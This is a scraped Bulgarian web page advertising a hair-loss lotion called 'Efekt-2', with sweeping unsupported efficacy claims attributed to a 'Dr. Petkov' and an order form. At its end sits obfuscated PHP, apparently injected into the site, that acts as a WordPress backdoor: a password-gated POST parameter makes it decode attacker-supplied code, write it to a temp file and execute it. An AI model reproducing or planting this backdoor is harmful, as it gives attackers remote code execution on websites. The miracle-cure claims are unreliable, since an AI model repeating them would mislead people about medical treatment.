Супер лосион срещу косопад "Ефект-2" | Косопад

Използвайте „Ефект-2” при косопад

Лосионът срещу косопад „Ефект – 2” стимулира косата само след един месец употреба

лосион срещу косопад

Ефект-2 при косопад

Революционният лосион срещу косопад и оплешивяване „Ефект – 2” е разработка на български и американски учени, която бележи ново начало в борбата с тези проблеми. „Ефект – 2” е изцяло екологичен продукт, който има невероятното свойство да стимулира растежа на космите.

Единственият по рода си лосион срещу косопад е съставен изцяло от натурални продукти, а формулата му включва провитамини, холин, билкови екстракти от репей, розмарин и латинка. Положителният ефект върху косата се дължи на свойството му да блокира дегенеративните процеси и да спомага възстановяването на корените на косата.

Уникалният препарат срещу косопад е създаден след дълги изследвания върху водещите до загуба на коса причини, споделя един от авторите доктор Петков – фармацевт – фармаколог. Той уточнява, че трите основни причинителя на косопад са:

• недостиг на аминокиселини и протеини със съдържание на сяра

• наличието на тестостерон във фоликула на космите

• силният психически стрес

„Проведохме задълбочено проучване и в течение на работата изпробвахме лосиона срещу косопад „Ефект – 2” върху 500 доброволци с различна степен на оплешивяване. Ефектът от третирането беше поразителен. Така стигнахме до извода, че „Ефект – 2” е най – ефикасното средство за борба с косопада! Той има свойството да прониква по уникален начин през кожата и да стимулира кръвообръщението на космените фоликули, да подсилва корените и да ги възстановява. Новопоникналата коса е блестяща, здрава и еластична” – споделя д-р Петков.

Употребата на „Ефект – 2” е изключително лесна. Нанася се външно върху кожата на главата, като е достатъчно по един път на ден да се втриват по 10-15 мл. в основата на космите. Заради свойството си да прониква мигновено през повърхностния слой на кожата, активните съставки започват действието си веднага. Главата може да се измие с мек натурален сапун след тридесет минути. Процедурите се правят ежедневно, в продължение на един месец. Постига се изумителен ефект, а новата коса обичайно пониква десет дни след първото нанасяне на лосиона срещу косопад.

лосион срещу косопад

Ефект-2 срещу косопад и оплешивяване

ЗА БЕЗПЛАТНА КОНСУЛТАЦИЯ ПОЗВЪНЕТЕ НА 0895 334 112

или поръчайте чрез формата отдолу

Вашето име (задължително)

Вашият Email (задължително)

Име на продукт и серия (задължително)

Точен Адрес (задължително)

Телефон за Връзка (задължително)

Брой Бутилки (задължително)

31. март 2013 19:44:29 от Косопад
Категории: Лосион срещу косопад, Срещу косопад - Ефект 2 | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}